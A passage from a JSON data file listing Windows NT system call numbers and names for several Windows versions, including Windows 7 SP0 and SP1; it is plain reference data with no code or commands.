"NtResetEvent", "322": "NtResetWriteWatch", "323": "NtRestoreKey", "324": "NtResumeProcess", "325": "NtRollbackComplete", "326": "NtRollbackEnlistment", "327": "NtRollbackTransaction", "328": "NtRollforwardTransactionManager", "329": "NtSaveKey", "330": "NtSaveKeyEx", "331": "NtSaveMergedKeys", "332": "NtSecureConnectPort", "333": "NtSerializeBoot", "334": "NtSetBootEntryOrder", "335": "NtSetBootOptions", "336": "NtSetContextThread", "337": "NtSetDebugFilterState", "338": "NtSetDefaultHardErrorPort", "339": "NtSetDefaultLocale", "340": "NtSetDefaultUILanguage", "341": "NtSetDriverEntryOrder", "342": "NtSetEaFile", "343": "NtSetHighEventPair", "344": "NtSetHighWaitLowEventPair", "345": "NtSetInformationDebugObject", "346": "NtSetInformationEnlistment", "347": "NtSetInformationJobObject", "348": "NtSetInformationKey", "349": "NtSetInformationResourceManager", "350": "NtSetInformationToken", "351": "NtSetInformationTransaction", "352": "NtSetInformationTransactionManager", "353": "NtSetInformationWorkerFactory", "354": "NtSetIntervalProfile", "355": "NtSetIoCompletion", "356": "NtSetIoCompletionEx", "357": "NtSetLdtEntries", "358": "NtSetLowEventPair", "359": "NtSetLowWaitHighEventPair", "360": "NtSetQuotaInformationFile", "361": "NtSetSecurityObject", "362": "NtSetSystemEnvironmentValue", "363": "NtSetSystemEnvironmentValueEx", "364": "NtSetSystemInformation", "365": "NtSetSystemPowerState", "366": "NtSetSystemTime", "367": "NtSetThreadExecutionState", "368": "NtSetTimerEx", "369": "NtSetTimerResolution", "370": "NtSetUuidSeed", "371": "NtSetVolumeInformationFile", "372": "NtShutdownSystem", "373": "NtShutdownWorkerFactory", "374": "NtSignalAndWaitForSingleObject", "375": "NtSinglePhaseReject", "376": "NtStartProfile", "377": "NtStopProfile", "378": "NtSuspendProcess", "379": "NtSuspendThread", "380": "NtSystemDebugControl", "381": "NtTerminateJobObject", "382": "NtTestAlert", "383": "NtThawRegistry", "384": "NtThawTransactions", "385": "NtTraceControl", "386": "NtTranslateFilePath", "387": "NtUmsThreadYield", "388": "NtUnloadDriver", "389": "NtUnloadKey", "390": "NtUnloadKey2", "391": "NtUnloadKeyEx", "392": "NtUnlockFile", "393": "NtUnlockVirtualMemory", "394": "NtVdmControl", "395": "NtWaitForDebugEvent", "396": "NtWaitForKeyedEvent", "397": "NtWaitForWorkViaWorkerFactory", "398": "NtWaitHighEventPair", "399": "NtWaitLowEventPair", "400": "NtWorkerFactoryWorkerReady"}, "R2 SP1": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateReserveObject", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtCancelIoFileEx", "135": "NtCancelSynchronousIoFile", "136": "NtCommitComplete", "137": "NtCommitEnlistment", "138": "NtCommitTransaction", "139": "NtCompactKeys", "140": "NtCompareTokens", "141": "NtCompleteConnectPort", "142": "NtCompressKey", "143": "NtConnectPort", "144": "NtCreateDebugObject", "145": "NtCreateDirectoryObject", "146": "NtCreateEnlistment", "147": "NtCreateEventPair", "148": "NtCreateIoCompletion", "149": "NtCreateJobObject", "150": "NtCreateJobSet", "151": "NtCreateKeyTransacted", "152": "NtCreateKeyedEvent", "153": "NtCreateMailslotFile", "154": "NtCreateMutant", "155": "NtCreateNamedPipeFile", "156": "NtCreatePagingFile", "157": "NtCreatePort", "158": "NtCreatePrivateNamespace", "159": "NtCreateProcess", "160": "NtCreateProfile", "161": "NtCreateProfileEx", "162": "NtCreateResourceManager", "163": "NtCreateSemaphore", "164": "NtCreateSymbolicLinkObject", "165": "NtCreateThreadEx", "166": "NtCreateTimer", "167": "NtCreateToken", "168": "NtCreateTransaction", "169": "NtCreateTransactionManager", "170": "NtCreateUserProcess", "171": "NtCreateWaitablePort", "172": "NtCreateWorkerFactory", "173": "NtDebugActiveProcess", "174": "NtDebugContinue", "175": "NtDeleteAtom", "176": "NtDeleteBootEntry", "177": "NtDeleteDriverEntry", "178": "NtDeleteFile", "179": "NtDeleteKey", "180": "NtDeleteObjectAuditAlarm", "181": "NtDeletePrivateNamespace", "182": "NtDeleteValueKey", "183": "NtDisableLastKnownGood", "184": "NtDisplayString", "185": "NtDrawText", "186": "NtEnableLastKnownGood", "187": "NtEnumerateBootEntries", "188": "NtEnumerateDriverEntries", "189": "NtEnumerateSystemEnvironmentValuesEx", "190": "NtEnumerateTransactionObject", "191": "NtExtendSection", "192": "NtFilterToken", "193": "NtFlushInstallUILanguage", "194": "NtFlushInstructionCache", "195": "NtFlushKey", "196": "NtFlushProcessWriteBuffers", "197": "NtFlushVirtualMemory", "198": "NtFlushWriteBuffer", "199": "NtFreeUserPhysicalPages", "200": "NtFreezeRegistry", "201": "NtFreezeTransactions", "202": "NtGetContextThread", "203": "NtGetCurrentProcessorNumber", "204": "NtGetDevicePowerState", "205": "NtGetMUIRegistryInfo", "206": "NtGetNextProcess", "207": "NtGetNextThread", "208": "NtGetNlsSectionPtr", "209": "NtGetNotificationResourceManager", "210": "NtGetPlugPlayEvent", "211": "NtGetWriteWatch", "212": "NtImpersonateAnonymousToken", "213": "NtImpersonateThread", "214": "NtInitializeNlsFiles", "215": "NtInitializeRegistry", "216": "NtInitiatePowerAction", "217": "NtIsSystemResumeAutomatic", "218": "NtIsUILanguageComitted", "219": "NtListenPort", "220": "NtLoadDriver", "221": "NtLoadKey", "222": "NtLoadKey2", "223": "NtLoadKeyEx", "224": "NtLockFile", "225": "NtLockProductActivationKeys", "226": "NtLockRegistryKey", "227": "NtLockVirtualMemory", "228": "NtMakePermanentObject", "229": "NtMakeTemporaryObject", "230": "NtMapCMFModule", "231": "NtMapUserPhysicalPages", "232": "NtModifyBootEntry", "233": "NtModifyDriverEntry", "234": "NtNotifyChangeDirectoryFile", "235": "NtNotifyChangeKey", "236": "NtNotifyChangeMultipleKeys", "237": "NtNotifyChangeSession", "238": "NtOpenEnlistment", "239": "NtOpenEventPair", "240": "NtOpenIoCompletion", "241": "NtOpenJobObject", "242": "NtOpenKeyEx", "243": "NtOpenKeyTransacted", "244": "NtOpenKeyTransactedEx", "245": "NtOpenKeyedEvent", "246": "NtOpenMutant", "247": "NtOpenObjectAuditAlarm", "248": "NtOpenPrivateNamespace", "249": "NtOpenProcessToken", "250": "NtOpenResourceManager", "251": "NtOpenSemaphore", "252": "NtOpenSession", "253": "NtOpenSymbolicLinkObject", "254": "NtOpenThread", "255": "NtOpenTimer", "256": "NtOpenTransaction", "257": "NtOpenTransactionManager", "258": "NtPlugPlayControl", "259": "NtPrePrepareComplete", "260": "NtPrePrepareEnlistment", "261": "NtPrepareComplete", "262": "NtPrepareEnlistment", "263": "NtPrivilegeCheck", "264": "NtPrivilegeObjectAuditAlarm", "265": "NtPrivilegedServiceAuditAlarm", "266": "NtPropagationComplete", "267": "NtPropagationFailed", "268": "NtPulseEvent", "269": "NtQueryBootEntryOrder", "270": "NtQueryBootOptions", "271": "NtQueryDebugFilterState", "272": "NtQueryDirectoryObject", "273": "NtQueryDriverEntryOrder", "274": "NtQueryEaFile", "275": "NtQueryFullAttributesFile", "276": "NtQueryInformationAtom", "277": "NtQueryInformationEnlistment", "278": "NtQueryInformationJobObject", "279": "NtQueryInformationPort", "280": "NtQueryInformationResourceManager", "281": "NtQueryInformationTransaction", "282": "NtQueryInformationTransactionManager", "283": "NtQueryInformationWorkerFactory", "284": "NtQueryInstallUILanguage", "285": "NtQueryIntervalProfile", "286": "NtQueryIoCompletion", "287": "NtQueryLicenseValue", "288": "NtQueryMultipleValueKey", "289": "NtQueryMutant", "290": "NtQueryOpenSubKeys", "291": "NtQueryOpenSubKeysEx", "292": "NtQueryPortInformationProcess", "293": "NtQueryQuotaInformationFile", "294": "NtQuerySecurityAttributesToken", "295": "NtQuerySecurityObject", "296": "NtQuerySemaphore", "297": "NtQuerySymbolicLinkObject", "298": "NtQuerySystemEnvironmentValue", "299": "NtQuerySystemEnvironmentValueEx", "300": "NtQuerySystemInformationEx", "301": "NtQueryTimerResolution", "302": "NtQueueApcThreadEx", "303": "NtRaiseException", "304": "NtRaiseHardError", "305": "NtReadOnlyEnlistment", "306": "NtRecoverEnlistment", "307": "NtRecoverResourceManager", "308": "NtRecoverTransactionManager", "309": "NtRegisterProtocolAddressInformation", "310": "NtRegisterThreadTerminatePort", "311": "NtReleaseKeyedEvent", "312": "NtReleaseWorkerFactoryWorker", "313": "NtRemoveIoCompletionEx", "314": "NtRemoveProcessDebug", "315": "NtRenameKey", "316": "NtRenameTransactionManager", "317": "NtReplaceKey", "318": "NtReplacePartitionUnit", "319": "NtReplyWaitReplyPort", "320": "NtRequestPort", "321": "NtResetEvent", "322": "NtResetWriteWatch", "323": "NtRestoreKey", "324": "NtResumeProcess", "325": "NtRollbackComplete", "326": "NtRollbackEnlistment", "327": "NtRollbackTransaction", "328": "NtRollforwardTransactionManager", "329": "NtSaveKey", "330": "NtSaveKeyEx", "331": "NtSaveMergedKeys", "332": "NtSecureConnectPort", "333": "NtSerializeBoot", "334": "NtSetBootEntryOrder", "335": "NtSetBootOptions", "336": "NtSetContextThread", "337": "NtSetDebugFilterState", "338": "NtSetDefaultHardErrorPort", "339": "NtSetDefaultLocale", "340": "NtSetDefaultUILanguage", "341": "NtSetDriverEntryOrder", "342": "NtSetEaFile", "343": "NtSetHighEventPair", "344": "NtSetHighWaitLowEventPair", "345": "NtSetInformationDebugObject", "346": "NtSetInformationEnlistment", "347": "NtSetInformationJobObject", "348": "NtSetInformationKey", "349": "NtSetInformationResourceManager", "350": "NtSetInformationToken", "351": "NtSetInformationTransaction", "352": "NtSetInformationTransactionManager", "353": "NtSetInformationWorkerFactory", "354": "NtSetIntervalProfile", "355": "NtSetIoCompletion", "356": "NtSetIoCompletionEx", "357": "NtSetLdtEntries", "358": "NtSetLowEventPair", "359": "NtSetLowWaitHighEventPair", "360": "NtSetQuotaInformationFile", "361": "NtSetSecurityObject", "362": "NtSetSystemEnvironmentValue", "363": "NtSetSystemEnvironmentValueEx", "364": "NtSetSystemInformation", "365": "NtSetSystemPowerState", "366": "NtSetSystemTime", "367": "NtSetThreadExecutionState", "368": "NtSetTimerEx", "369": "NtSetTimerResolution", "370": "NtSetUuidSeed", "371": "NtSetVolumeInformationFile", "372": "NtShutdownSystem", "373": "NtShutdownWorkerFactory", "374": "NtSignalAndWaitForSingleObject", "375": "NtSinglePhaseReject", "376": "NtStartProfile", "377": "NtStopProfile", "378": "NtSuspendProcess", "379": "NtSuspendThread", "380": "NtSystemDebugControl", "381": "NtTerminateJobObject", "382": "NtTestAlert", "383": "NtThawRegistry", "384": "NtThawTransactions", "385": "NtTraceControl", "386": "NtTranslateFilePath", "387": "NtUmsThreadYield", "388": "NtUnloadDriver", "389": "NtUnloadKey", "390": "NtUnloadKey2", "391": "NtUnloadKeyEx", "392": "NtUnlockFile", "393": "NtUnlockVirtualMemory", "394": "NtVdmControl", "395": "NtWaitForDebugEvent", "396": "NtWaitForKeyedEvent", "397": "NtWaitForWorkViaWorkerFactory", "398": "NtWaitHighEventPair", "399": "NtWaitLowEventPair", "400": "NtWorkerFactoryWorkerReady"}}, "Windows 7": {"SP0": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateReserveObject", "109": "NtAllocateUserPhysicalPages", "110": "NtAllocateUuids", "111": "NtAlpcAcceptConnectPort", "112": "NtAlpcCancelMessage", "113": "NtAlpcConnectPort", "114": "NtAlpcCreatePort", "115": "NtAlpcCreatePortSection", "116": "NtAlpcCreateResourceReserve", "117": "NtAlpcCreateSectionView", "118": "NtAlpcCreateSecurityContext", "119": "NtAlpcDeletePortSection", "120": "NtAlpcDeleteResourceReserve", "121": "NtAlpcDeleteSectionView", "122": "NtAlpcDeleteSecurityContext", "123": "NtAlpcDisconnectPort", "124": "NtAlpcImpersonateClientOfPort", "125": "NtAlpcOpenSenderProcess", "126": "NtAlpcOpenSenderThread", "127": "NtAlpcQueryInformation", "128": "NtAlpcQueryInformationMessage", "129": "NtAlpcRevokeSecurityContext", "130": "NtAlpcSendWaitReceivePort", "131": "NtAlpcSetInformation", "132": "NtAreMappedFilesTheSame", "133": "NtAssignProcessToJobObject", "134": "NtCancelIoFileEx", "135": "NtCancelSynchronousIoFile", "136": "NtCommitComplete", "137": "NtCommitEnlistment", "138": "NtCommitTransaction", "139": "NtCompactKeys", "140": "NtCompareTokens", "141": "NtCompleteConnectPort", "142": "NtCompressKey", "143": "NtConnectPort", "144": "NtCreateDebugObject", "145": "NtCreateDirectoryObject", "146": "NtCreateEnlistment", "147": "NtCreateEventPair", "148": "NtCreateIoCompletion", "149": "NtCreateJobObject", "150": "NtCreateJobSet", "151": "NtCreateKeyTransacted", "152": "NtCreateKeyedEvent", "153": "NtCreateMailslotFile", "154": "NtCreateMutant", "155": "NtCreateNamedPipeFile", "156": "NtCreatePagingFile", "157": "NtCreatePort", "158": "NtCreatePrivateNamespace", "159": "NtCreateProcess", "160": "NtCreateProfile", "161": "NtCreateProfileEx", "162": "NtCreateResourceManager", "163": "NtCreateSemaphore", "164": "NtCreateSymbolicLinkObject", "165": "NtCreateThreadEx", "166": "NtCreateTimer", "167": "NtCreateToken", "168": "NtCreateTransaction", "169": "NtCreateTransactionManager", "170": "NtCreateUserProcess", "171": "NtCreateWaitablePort", "172": "NtCreateWorkerFactory", "173": "NtDebugActiveProcess", "174": "NtDebugContinue", "175": "NtDeleteAtom", "176": "NtDeleteBootEntry", "177": "NtDeleteDriverEntry", "178": "NtDeleteFile", "179": "NtDeleteKey", "180": "NtDeleteObjectAuditAlarm", "181": "NtDeletePrivateNamespace", "182": "NtDeleteValueKey", "183": "NtDisableLastKnownGood", "184": "NtDisplayString", "185": "NtDrawText", "186": "NtEnableLastKnownGood", "187": "NtEnumerateBootEntries", "188": "NtEnumerateDriverEntries", "189": "NtEnumerateSystemEnvironmentValuesEx", "190": "NtEnumerateTransactionObject", "191": "NtExtendSection", "192": "NtFilterToken", "193": "NtFlushInstallUILanguage", "194": "NtFlushInstructionCache", "195": "NtFlushKey", "196": "NtFlushProcessWriteBuffers", "197": "NtFlushVirtualMemory", "198": "NtFlushWriteBuffer", "199": "NtFreeUserPhysicalPages", "200": "NtFreezeRegistry", "201": "NtFreezeTransactions", "202": "NtGetContextThread", "203": "NtGetCurrentProcessorNumber", "204": "NtGetDevicePowerState", "205": "NtGetMUIRegistryInfo", "206": "NtGetNextProcess", "207": "NtGetNextThread", "208": "NtGetNlsSectionPtr", "209": "NtGetNotificationResourceManager", "210": "NtGetPlugPlayEvent", "211": "NtGetWriteWatch", "212": "NtImpersonateAnonymousToken", "213": "NtImpersonateThread", "214": "NtInitializeNlsFiles", "215": "NtInitializeRegistry", "216": "NtInitiatePowerAction", "217": "NtIsSystemResumeAutomatic", "218": "NtIsUILanguageComitted", "219": "NtListenPort", "220": "NtLoadDriver", "221": "NtLoadKey", "222": "NtLoadKey2", "223": "NtLoadKeyEx", "224": "NtLockFile", "225": "NtLockProductActivationKeys", "226": "NtLockRegistryKey", "227": "NtLockVirtualMemory", "228": "NtMakePermanentObject", "229": "NtMakeTemporaryObject", "230": "NtMapCMFModule", "231": "NtMapUserPhysicalPages", "232": "NtModifyBootEntry", "233": "NtModifyDriverEntry", "234": "NtNotifyChangeDirectoryFile", "235": "NtNotifyChangeKey", "236": "NtNotifyChangeMultipleKeys", "237": "NtNotifyChangeSession", "238": "NtOpenEnlistment", "239": "NtOpenEventPair", "240": "NtOpenIoCompletion", "241": "NtOpenJobObject", "242": "NtOpenKeyEx", "243": "NtOpenKeyTransacted", "244": "NtOpenKeyTransactedEx", "245": "NtOpenKeyedEvent", "246": "NtOpenMutant", "247": "NtOpenObjectAuditAlarm", "248": "NtOpenPrivateNamespace", "249": "NtOpenProcessToken", "250": "NtOpenResourceManager", "251": "NtOpenSemaphore", "252": "NtOpenSession", "253": "NtOpenSymbolicLinkObject", "254": "NtOpenThread", "255": "NtOpenTimer", "256": "NtOpenTransaction", "257": "NtOpenTransactionManager", "258": "NtPlugPlayControl", "259": "NtPrePrepareComplete", "260": "NtPrePrepareEnlistment", "261": "NtPrepareComplete", "262": "NtPrepareEnlistment", "263": "NtPrivilegeCheck", "264": "NtPrivilegeObjectAuditAlarm", "265": "NtPrivilegedServiceAuditAlarm", "266": "NtPropagationComplete", "267": "NtPropagationFailed", "268": "NtPulseEvent", "269": "NtQueryBootEntryOrder", "270": "NtQueryBootOptions", "271": "NtQueryDebugFilterState", "272": "NtQueryDirectoryObject", "273": "NtQueryDriverEntryOrder", "274": "NtQueryEaFile", "275": "NtQueryFullAttributesFile", "276": "NtQueryInformationAtom", "277": "NtQueryInformationEnlistment", "278": "NtQueryInformationJobObject", "279": "NtQueryInformationPort", "280": "NtQueryInformationResourceManager", "281": "NtQueryInformationTransaction", "282": "NtQueryInformationTransactionManager", "283": "NtQueryInformationWorkerFactory", "284": "NtQueryInstallUILanguage", "285": "NtQueryIntervalProfile", "286": "NtQueryIoCompletion", "287": "NtQueryLicenseValue", "288": "NtQueryMultipleValueKey", "289": "NtQueryMutant", "290": "NtQueryOpenSubKeys", "291": "NtQueryOpenSubKeysEx", "292": "NtQueryPortInformationProcess", "293": "NtQueryQuotaInformationFile", "294": "NtQuerySecurityAttributesToken", "295": "NtQuerySecurityObject", "296": "NtQuerySemaphore", "297": "NtQuerySymbolicLinkObject", "298": "NtQuerySystemEnvironmentValue", "299": "NtQuerySystemEnvironmentValueEx", "300": "NtQuerySystemInformationEx", "301": "NtQueryTimerResolution", "302": "NtQueueApcThreadEx", "303": "NtRaiseException", "304": "NtRaiseHardError", "305": "NtReadOnlyEnlistment", "306": "NtRecoverEnlistment", "307": "NtRecoverResourceManager", "308": "NtRecoverTransactionManager", "309": "NtRegisterProtocolAddressInformation", "310": "NtRegisterThreadTerminatePort", "311": "NtReleaseKeyedEvent", "312": "NtReleaseWorkerFactoryWorker", "313": "NtRemoveIoCompletionEx", "314": "NtRemoveProcessDebug", "315": "NtRenameKey", "316": "NtRenameTransactionManager", "317": "NtReplaceKey", "318": "NtReplacePartitionUnit", "319": "NtReplyWaitReplyPort", "320": "NtRequestPort", "321": "NtResetEvent", "322": "NtResetWriteWatch", "323": "NtRestoreKey", "324": "NtResumeProcess", "325": "NtRollbackComplete", "326": "NtRollbackEnlistment", "327": "NtRollbackTransaction", "328": "NtRollforwardTransactionManager", "329": "NtSaveKey", "330": "NtSaveKeyEx", "331": "NtSaveMergedKeys", "332": "NtSecureConnectPort", "333": "NtSerializeBoot", "334": "NtSetBootEntryOrder", "335": "NtSetBootOptions", "336": "NtSetContextThread", "337": "NtSetDebugFilterState", "338": "NtSetDefaultHardErrorPort", "339": "NtSetDefaultLocale", "340": "NtSetDefaultUILanguage", "341": "NtSetDriverEntryOrder", "342": "NtSetEaFile", "343": "NtSetHighEventPair", "344": "NtSetHighWaitLowEventPair", "345": "NtSetInformationDebugObject", "346": "NtSetInformationEnlistment", "347": "NtSetInformationJobObject", "348": "NtSetInformationKey", "349": "NtSetInformationResourceManager", "350": "NtSetInformationToken", "351": "NtSetInformationTransaction", "352": "NtSetInformationTransactionManager", "353": "NtSetInformationWorkerFactory", "354": "NtSetIntervalProfile", "355": "NtSetIoCompletion", "356": "NtSetIoCompletionEx", "357": "NtSetLdtEntries", "358": "NtSetLowEventPair", "359": "NtSetLowWaitHighEventPair", "360": "NtSetQuotaInformationFile", "361": "NtSetSecurityObject", "362": "NtSetSystemEnvironmentValue", "363": "NtSetSystemEnvironmentValueEx", "364": "NtSetSystemInformation", "365": "NtSetSystemPowerState", "366": "NtSetSystemTime", "367": "NtSetThreadExecutionState", "368": "NtSetTimerEx", "369": "NtSetTimerResolution", "370": "NtSetUuidSeed", "371": "NtSetVolumeInformationFile", "372": "NtShutdownSystem", "373": "NtShutdownWorkerFactory", "374": "NtSignalAndWaitForSingleObject", "375": "NtSinglePhaseReject", "376": "NtStartProfile", "377": "NtStopProfile", "378": "NtSuspendProcess", "379": "NtSuspendThread", "380": "NtSystemDebugControl", "381": "NtTerminateJobObject", "382": "NtTestAlert", "383": "NtThawRegistry", "384": "NtThawTransactions", "385": "NtTraceControl", "386": "NtTranslateFilePath", "387": "NtUmsThreadYield", "388": "NtUnloadDriver", "389": "NtUnloadKey", "390": "NtUnloadKey2", "391": "NtUnloadKeyEx", "392": "NtUnlockFile", "393": "NtUnlockVirtualMemory", "394": "NtVdmControl", "395": "NtWaitForDebugEvent", "396": "NtWaitForKeyedEvent", "397": "NtWaitForWorkViaWorkerFactory", "398": "NtWaitHighEventPair", "399": "NtWaitLowEventPair", "400": "NtWorkerFactoryWorkerReady"}, "SP1": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": 